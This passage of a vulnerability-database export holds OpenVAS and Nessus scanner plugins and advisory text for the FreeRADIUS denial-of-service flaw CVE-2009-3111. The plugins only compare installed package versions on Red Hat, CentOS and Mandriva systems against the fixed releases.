rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:55:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "modified": "2017-07-12T00:00:00", "published": "2009-09-21T00:00:00", "id": "OPENVAS:64905", "href": "http://plugins.openvas.org/nasl.php?oid=64905", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1451", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1451.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64905);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-debuginfo\", rpm:\"freeradius-debuginfo~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "Check for the Version of freeradius", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880824", "href": "http://plugins.openvas.org/nasl.php?oid=880824", "type": "openvas", "title": "CentOS Update for freeradius CESA-2009:1451 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for freeradius CESA-2009:1451 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"FreeRADIUS is a high-performance and highly configurable free Remote\n Authentication Dial In User Service (RADIUS) server, designed to allow\n centralized authentication and authorization for a network.\n\n An input validation flaw was discovered in the way FreeRADIUS decoded\n specific RADIUS attributes from RADIUS packets. A remote attacker could use\n this flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\n RADIUS packet. (CVE-2009-3111)\n \n Users of FreeRADIUS are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, radiusd will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"freeradius on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\");\n script_id(880824);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1451\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_name(\"CentOS Update for freeradius CESA-2009:1451 centos5 i386\");\n\n script_summary(\"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "Check for the Version of freeradius", "modified": "2017-12-20T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:830798", "href": "http://plugins.openvas.org/nasl.php?oid=830798", "type": "openvas", "title": "Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in freeradius:\n\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\n attackers to cause a denial of service (radiusd crash) via zero-length\n Tunnel-Password attributes. NOTE: this is a regression error related\n to CVE-2003-0967 (CVE-2009-3111).\n \n This update provides a solution to this vulnerability.\n \n Update:\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"freeradius on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00022.php\");\n script_id(830798);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2009:227-1\");\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_name(\"Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1\", rpm:\"libfreeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-devel\", rpm:\"libfreeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-krb5\", rpm:\"libfreeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-ldap\", rpm:\"libfreeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-mysql\", rpm:\"libfreeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-postgresql\", rpm:\"libfreeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-unixODBC\", rpm:\"libfreeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1\", rpm:\"lib64freeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-devel\", rpm:\"lib64freeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-krb5\", rpm:\"lib64freeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-ldap\", rpm:\"lib64freeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-mysql\", rpm:\"lib64freeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-postgresql\", rpm:\"lib64freeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-unixODBC\", rpm:\"lib64freeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T11:52:17", "description": "A vulnerability has been found and corrected in freeradius :\n\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967 (CVE-2009-3111).\n\nThis update provides a solution to this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.", "edition": 24, "published": "2010-01-12T00:00:00", "title": "Mandriva Linux Security Advisory : freeradius (MDVSA-2009:227-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2010-01-12T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64freeradius1-ldap", "p-cpe:/a:mandriva:linux:lib64freeradius1-devel", "p-cpe:/a:mandriva:linux:libfreeradius1", "p-cpe:/a:mandriva:linux:libfreeradius1-ldap", "p-cpe:/a:mandriva:linux:lib64freeradius1-krb5", "p-cpe:/a:mandriva:linux:lib64freeradius1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:freeradius", "p-cpe:/a:mandriva:linux:lib64freeradius1-postgresql", "p-cpe:/a:mandriva:linux:lib64freeradius1-mysql", "p-cpe:/a:mandriva:linux:libfreeradius1-krb5", "p-cpe:/a:mandriva:linux:libfreeradius1-postgresql", "p-cpe:/a:mandriva:linux:libfreeradius1-devel", "p-cpe:/a:mandriva:linux:lib64freeradius1-unixODBC", "p-cpe:/a:mandriva:linux:libfreeradius1-unixODBC", "p-cpe:/a:mandriva:linux:libfreeradius1-mysql"], "id": "MANDRIVA_MDVSA-2009-227.NASL", "href": "https://www.tenable.com/plugins/nessus/43851", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:227. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43851);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"MDVSA\", value:\"2009:227-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : freeradius (MDVSA-2009:227-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in freeradius :\n\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967 (CVE-2009-3111).\n\nThis update provides a solution to this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"freeradius-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-devel-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-krb5-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-ldap-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-mysql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-postgresql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-unixODBC-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-devel-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-krb5-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-ldap-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-mysql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-postgresql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-unixODBC-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:07:03", "description": "Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.", "edition": 26, "published": "2009-09-18T00:00:00", "title": "RHEL 5 : freeradius (RHSA-2009:1451)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2009-09-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:freeradius-unixODBC", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:freeradius-mysql", "p-cpe:/a:redhat:enterprise_linux:freeradius", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:freeradius-postgresql"], "id": "REDHAT-RHSA-2009-1451.NASL", "href": "https://www.tenable.com/plugins/nessus/41008", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41008);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"RHEL 5 : freeradius (RHSA-2009:1451)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1451\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 